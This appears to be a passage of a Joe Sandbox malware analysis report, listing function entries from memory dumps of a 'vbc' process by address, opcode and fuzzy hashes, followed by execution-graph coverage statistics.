                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d6cf253bc0c6fa96e7aa6aaf0d195a9f435489c60e7a26b04a6703ed752de14a
                                                                                                                                              • Instruction ID: b37684073ca5e2bbf2e64a440296a27da840cb95df2fd834848e33e9c223bae3
                                                                                                                                              • Opcode Fuzzy Hash: d6cf253bc0c6fa96e7aa6aaf0d195a9f435489c60e7a26b04a6703ed752de14a
                                                                                                                                              • Instruction Fuzzy Hash: D121D4313042104BDB1C9A65D854B3EB68BBFC4749F148439DE02CB7A8EEBACC92D395
                                                                                                                                              Function 053F2790 Relevance: .1, Instructions: 82COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e1534124172abddccfabea5673089f5a3afb6e971d34a3b5fd11b45c85bbed6b
                                                                                                                                              • Instruction ID: 37deef5c08b980e32e8ade112d9131b4b2a9518fde6f6f56f91a669e6bd71d8e
                                                                                                                                              • Opcode Fuzzy Hash: e1534124172abddccfabea5673089f5a3afb6e971d34a3b5fd11b45c85bbed6b
                                                                                                                                              • Instruction Fuzzy Hash: 89313A749093898FCB02DFB4D8455EEBFB5EF4A200F1401AAD585A7251EB351A85CBA2
                                                                                                                                              Function 053F28F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3f58277d93e90090064bf18ff0ae7fe4c6d4c9fdf046241489193ea2fc30872a
                                                                                                                                              • Instruction ID: f83ccb55ab8b12bc2a5edc8f24af2e803832a4143575bab6475e7554c7ab990b
                                                                                                                                              • Opcode Fuzzy Hash: 3f58277d93e90090064bf18ff0ae7fe4c6d4c9fdf046241489193ea2fc30872a
                                                                                                                                              • Instruction Fuzzy Hash: 6C217479A00116DFCB24DF24C8409AF77A6FB9D360F50C159E90A9B344DB31EA42CBD1
                                                                                                                                              Function 053F6300 Relevance: .1, Instructions: 74COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f624c23fb0bce3ce3a73ab022cf13d64f11c040fb3ce8293b8fe87c6ce7a9717
                                                                                                                                              • Instruction ID: c95a2dd941501349afcfa00c4d406071f0d14d581cb2d5232182443bbbf448c5
                                                                                                                                              • Opcode Fuzzy Hash: f624c23fb0bce3ce3a73ab022cf13d64f11c040fb3ce8293b8fe87c6ce7a9717
                                                                                                                                              • Instruction Fuzzy Hash: B821F3353056118FC7299A65D45992EB3A6FFC5750704402AEA07CB7A4CF31DC028B80
                                                                                                                                              Function 053AD044 Relevance: .1, Instructions: 72COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055393501.00000000053AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 053AD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53ad000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: addf7d2936fa18fba039e2c4d4f5fd9f8b1874e0eaa6bc0079f3122efcdb5453
                                                                                                                                              • Instruction ID: 7e4ee2a9a4097e2a4f478a01c5429a5468373ffd4fa549e450679cb1540b8b87
                                                                                                                                              • Opcode Fuzzy Hash: addf7d2936fa18fba039e2c4d4f5fd9f8b1874e0eaa6bc0079f3122efcdb5453
                                                                                                                                              • Instruction Fuzzy Hash: 39210776604304DFDB14DF10D9C4B26BB66FB84714F60C96DE8494BB42C77AD446CB62
                                                                                                                                              Function 053F5649 Relevance: .1, Instructions: 71COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: eb8dcdb10ddb3a52df7a9560e7b9be49d18a5d721abd427c4fc486381db8ea31
                                                                                                                                              • Instruction ID: 5f39f1a91b2828947f03318e386503f578081c9cb09c7805d9266f7932f6a88b
                                                                                                                                              • Opcode Fuzzy Hash: eb8dcdb10ddb3a52df7a9560e7b9be49d18a5d721abd427c4fc486381db8ea31
                                                                                                                                              • Instruction Fuzzy Hash: 242146B13062489FCB15AF64E848A7E3BA6FB88310F004429F9158B745DB79CD54CBE0
                                                                                                                                              Function 053F3CC0 Relevance: .1, Instructions: 69COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2690c580f310a895f9c88733f54154500638a9ce67dc7d4497946bb19421e7b8
                                                                                                                                              • Instruction ID: 84e7bae302468d0867823da2bc60ee3885c41051781d42db76770e3544cb579a
                                                                                                                                              • Opcode Fuzzy Hash: 2690c580f310a895f9c88733f54154500638a9ce67dc7d4497946bb19421e7b8
                                                                                                                                              • Instruction Fuzzy Hash: 2311A031B0436847EB2C55AA489463BA69FFFC5A54F24483AEA1693254DFB1CC0193B1
                                                                                                                                              Function 053FAEF0 Relevance: .1, Instructions: 69COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c82924b497c78d473a10e769c01e8f2a723fe670c3fcbf0e52e804d182d980c2
                                                                                                                                              • Instruction ID: 836338eb06f88b1ec3fcf09a3ee8e81c3dc5aebea3697e3075b84163e269ae53
                                                                                                                                              • Opcode Fuzzy Hash: c82924b497c78d473a10e769c01e8f2a723fe670c3fcbf0e52e804d182d980c2
                                                                                                                                              • Instruction Fuzzy Hash: 1821A871700204ABCB148F64DC59EEDBBB6FB4C310F144055E915A7250DB719D10CBA0
                                                                                                                                              Function 053F4285 Relevance: .1, Instructions: 68COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1f8a8dd39ac1b6b7811e00815295463216c93dac07910efe56a1d7568d632749
                                                                                                                                              • Instruction ID: 37b1e7711066b06ab01e448b217fc9915d898f63b3ed0e26d70c14348ba8eb9c
                                                                                                                                              • Opcode Fuzzy Hash: 1f8a8dd39ac1b6b7811e00815295463216c93dac07910efe56a1d7568d632749
                                                                                                                                              • Instruction Fuzzy Hash: 0A319674E11209DFCB54DFA4E59489DBBB6FF89301B209069E81AAB721DB35AD01CF40
                                                                                                                                              Function 053F9761 Relevance: .1, Instructions: 65COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6e80f5d8718fe394256d68a7ee23a752ccb19b4a8851194c2873697e80305905
                                                                                                                                              • Instruction ID: cbb2c452ae2c18e75503511d9719365d48e56c481ba21911bbed782167bbfd81
                                                                                                                                              • Opcode Fuzzy Hash: 6e80f5d8718fe394256d68a7ee23a752ccb19b4a8851194c2873697e80305905
                                                                                                                                              • Instruction Fuzzy Hash: 9721A931E022489FDB15CFA1E590BEEBFBAFF88300F248069E511E6290DB35D945CB60
                                                                                                                                              Function 053F62F0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e185525378d959b49d67b47d18e43ba894379a6f45efeb60e98ce5709584d4e0
                                                                                                                                              • Instruction ID: 611f7d40cb694dce98bb9768cc6d0e22e9841cb62f8e867d73dfd5b60e85b26f
                                                                                                                                              • Opcode Fuzzy Hash: e185525378d959b49d67b47d18e43ba894379a6f45efeb60e98ce5709584d4e0
                                                                                                                                              • Instruction Fuzzy Hash: A611E33170A6118FC7199A69D85993E77A6BFC6791318407EE506CB7A1CF32DC028B90
                                                                                                                                              Function 053FF640 Relevance: .1, Instructions: 60COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f5201bf155a8e03b547b7bfe27533bcf4853acb0de32910f2c0ad09d40e3b07e
                                                                                                                                              • Instruction ID: 8c214468a3c9beb798fec355eab3ef0758e8a22deef96bc0ed063aac087fb8f8
                                                                                                                                              • Opcode Fuzzy Hash: f5201bf155a8e03b547b7bfe27533bcf4853acb0de32910f2c0ad09d40e3b07e
                                                                                                                                              • Instruction Fuzzy Hash: FD216AB0D0134A9FEB05EFB9D84079EBFB6FB84300F1085AAD4589B355EB709A059B81
                                                                                                                                              Function 053F27F0 Relevance: .1, Instructions: 54COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 79063007998fe5650a0c0e5a022a0d440868c127122925e3fb2deb4c6f3ceb8b
                                                                                                                                              • Instruction ID: 33ea8fc806d3fbe7f6cbbf0231b23db6379ceced8080eed6ff1c5be0ca0a5978
                                                                                                                                              • Opcode Fuzzy Hash: 79063007998fe5650a0c0e5a022a0d440868c127122925e3fb2deb4c6f3ceb8b
                                                                                                                                              • Instruction Fuzzy Hash: 33210274C0524A8FCB41DFB9E4495EEBFF4EF0A210F14026AD485B6210EB351A85CB91
                                                                                                                                              Function 053FF650 Relevance: .1, Instructions: 54COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 88ebb115fda992c0f4ebd1f3c571339b64332184f8954559d9bf7ac46afbd6f5
                                                                                                                                              • Instruction ID: de43cfab5f107c1ecd89526ff8991aed094211146563e95c3f466bbb904fffc5
                                                                                                                                              • Opcode Fuzzy Hash: 88ebb115fda992c0f4ebd1f3c571339b64332184f8954559d9bf7ac46afbd6f5
                                                                                                                                              • Instruction Fuzzy Hash: AA1149B0E01309DFEB04EFA8D94079EBBF6FBC4305F5085A9D1189B355EB709A059B81
                                                                                                                                              Function 053AD03F Relevance: .1, Instructions: 53COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055393501.00000000053AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 053AD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53ad000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                                                              • Instruction ID: e144abbb043d12a34fda28b9e5a329ab15542c5dc1e71d93eff67c22ebb47295
                                                                                                                                              • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                                                              • Instruction Fuzzy Hash: BB119076504244DFCB15CF14D5C4B15BB62FB44314F24CAADE8494B656C37AD44ACF51
                                                                                                                                              Function 053F5E98 Relevance: .1, Instructions: 52COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: af842b1584a0ba337c976235e0d2ce0dd2bd49488909d179b3fe2836c6476a32
                                                                                                                                              • Instruction ID: 8441ff48e4ee93dd7beef09a93e7e8d5d3e780326262692d3ed8b9a126255100
                                                                                                                                              • Opcode Fuzzy Hash: af842b1584a0ba337c976235e0d2ce0dd2bd49488909d179b3fe2836c6476a32
                                                                                                                                              • Instruction Fuzzy Hash: 500168B27052446FCB429EA49C146EF3FA7EBC9640F18405AFA01C7380CA368D1297D0
                                                                                                                                              Function 053F9D59 Relevance: .0, Instructions: 44COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 418f820a4127ac58f28014031a3484c388cf93277d95248e9a98b609de61436d
                                                                                                                                              • Instruction ID: 6eca2f92da1d08eb19ee5834736f3ffad8394a486289776f17a1e958daec3a4e
                                                                                                                                              • Opcode Fuzzy Hash: 418f820a4127ac58f28014031a3484c388cf93277d95248e9a98b609de61436d
                                                                                                                                              • Instruction Fuzzy Hash: 0FF044363002156FDB085AA5A854B7BBA9BEFC8260B148429BA4AC7351DE76CC0197A1
                                                                                                                                              Function 053FABE0 Relevance: .0, Instructions: 44COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9b20f273f3e140ee8f57d5835159c4f41c7e353215052ecf6c5d3da67a930977
                                                                                                                                              • Instruction ID: ca92c13d214fdb3738d42a505031f08bf63285476e447d765b6629a839620000
                                                                                                                                              • Opcode Fuzzy Hash: 9b20f273f3e140ee8f57d5835159c4f41c7e353215052ecf6c5d3da67a930977
                                                                                                                                              • Instruction Fuzzy Hash: 82F096313146104B87155A6EA458A2AB6DEFFC8A593594079EA0EC7361EEA1DC438790
                                                                                                                                              Function 053FE8E8 Relevance: .0, Instructions: 41COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9af8abeed3c0e79b3293efff592a9a32adabc0fa1f16e3e58ed146bf027a4fd0
                                                                                                                                              • Instruction ID: 40e3d150519b09751d4d78f65f1f8118cc5fb4b51c11c0060979ea27bc663e31
                                                                                                                                              • Opcode Fuzzy Hash: 9af8abeed3c0e79b3293efff592a9a32adabc0fa1f16e3e58ed146bf027a4fd0
                                                                                                                                              • Instruction Fuzzy Hash: 751157B4D0524AEFCF01CFA8D454AEEBBB5FB89301F40446AD910A3751D7345A16DF90
                                                                                                                                              Function 053F6739 Relevance: .0, Instructions: 20COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 60fb4d23645012e128bf06283fc0238ae45b34986cae319f51e2ff5d6d1f6946
                                                                                                                                              • Instruction ID: 0349dba34fc1e57a59068a0d02df5274f1b7fee48fad6f1e8b5c1b65614c2cf5
                                                                                                                                              • Opcode Fuzzy Hash: 60fb4d23645012e128bf06283fc0238ae45b34986cae319f51e2ff5d6d1f6946
                                                                                                                                              • Instruction Fuzzy Hash: 22E08C300093C60ECB03A374A8A90687F2AEEC2900B188996D0840994BEF64692983A1
                                                                                                                                              Function 053F28AB Relevance: .0, Instructions: 20COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6c632a9b3e63d7007aa45ce402e3b8ae4b6910b7639a1a07cbf0404f4be2e5cb
                                                                                                                                              • Instruction ID: d33a9113c1255a00e3e6fa639b5ba39e94af6f4d90c08b01fb93d93a24beaddf
                                                                                                                                              • Opcode Fuzzy Hash: 6c632a9b3e63d7007aa45ce402e3b8ae4b6910b7639a1a07cbf0404f4be2e5cb
                                                                                                                                              • Instruction Fuzzy Hash: 18E0C231E2012B86CB10DBA0EC444EEFB34EED5312B404227D41036000EB301699C7A1
                                                                                                                                              Function 053F8EF7 Relevance: .0, Instructions: 19COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 13fc1bae1fdb04e33a3e0051a1550c33ded3f5863dea3367cc4738107d139efc
                                                                                                                                              • Instruction ID: 70d4c9f05f3cf7a6e4aeadf1be5545a25f35a0c1b28ff6e1d2e8b5ed03d790fc
                                                                                                                                              • Opcode Fuzzy Hash: 13fc1bae1fdb04e33a3e0051a1550c33ded3f5863dea3367cc4738107d139efc
                                                                                                                                              • Instruction Fuzzy Hash: 89C0123360C2283EA238504E7C41EF3BB8ED2C12B4A210237FA1C93A01AC829C8002F9
                                                                                                                                              Function 053F28B0 Relevance: .0, Instructions: 19COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: bdd00566e0069553afe398027035b6c58fc929af020af8857e953559e1b9bcaa
                                                                                                                                              • Instruction ID: 95853cd4a34060b04074003491279439ef00b1d81410583e0b290ca678964f17
                                                                                                                                              • Opcode Fuzzy Hash: bdd00566e0069553afe398027035b6c58fc929af020af8857e953559e1b9bcaa
                                                                                                                                              • Instruction Fuzzy Hash: 15D05B31D2022B97CB10E7A5DC044EFF738EED5262B504626D51537140FB712659C6E1
                                                                                                                                              Function 053FD6D4 Relevance: .0, Instructions: 16COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 651d6f7a9ca4e917595af60235309c6da09a02a313ef356bdb7411642db66ebc
                                                                                                                                              • Instruction ID: 57591397658ab47f1528264d3c9c6d8ac9664d06e3ad8334b59a1856244b1c4e
                                                                                                                                              • Opcode Fuzzy Hash: 651d6f7a9ca4e917595af60235309c6da09a02a313ef356bdb7411642db66ebc
                                                                                                                                              • Instruction Fuzzy Hash: DAD04235E05109CBCB60DFA8E4894DCFB71EB99222B10942BD929A3651DB3558558F11
                                                                                                                                              Function 053FAFAD Relevance: .0, Instructions: 16COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a9b3188869eced4e4bf4676e7c2dd0c3d89de01466f38577d50bcfa4892f4f40
                                                                                                                                              • Instruction ID: ccb319cc2cd82a2e9872deade4fa32471503c4b6994813e27985be68bbfa5dfd
                                                                                                                                              • Opcode Fuzzy Hash: a9b3188869eced4e4bf4676e7c2dd0c3d89de01466f38577d50bcfa4892f4f40
                                                                                                                                              • Instruction Fuzzy Hash: 20D0677AB00008AFCB049F99E8449DDF776FB98221B048116E915A3260C6319925DB60
                                                                                                                                              Function 053F6748 Relevance: .0, Instructions: 12COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a856c616fe4a416d9def087ec60527cd12caa699849b2be9f5bbc88c0814a368
                                                                                                                                              • Instruction ID: fbd716bb77c05a36881fd40718a1bd0cfc284d3a92906247aac7232e690123ac
                                                                                                                                              • Opcode Fuzzy Hash: a856c616fe4a416d9def087ec60527cd12caa699849b2be9f5bbc88c0814a368
                                                                                                                                              • Instruction Fuzzy Hash: 7FC012301017184FD545F765FC9A515371EB6D0E11B408514940519A4FEF74A84957D1

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:11.2%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:162
                                                                                                                                              Total number of Limit Nodes:6
